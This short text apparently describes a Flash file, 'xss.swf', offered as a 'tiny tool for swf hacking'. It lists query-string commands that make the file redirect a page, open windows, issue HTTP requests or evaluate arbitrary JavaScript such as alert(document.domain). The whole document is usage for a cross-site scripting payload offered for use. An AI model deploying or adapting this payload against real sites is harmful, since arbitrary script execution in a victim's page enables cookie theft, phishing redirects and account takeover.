a tiny tool for swf hacking, just browse it:)
- location to url: xss.swf?a=location&c=http://www.google.com/
- open url to new window: xss.swf?a=open&c=http://www.google.com/
- http request to url: xss.swf?a=get&c=http://www.google.com/
- eval js codz: xss.swf?a=eval&c=alert(document.domain)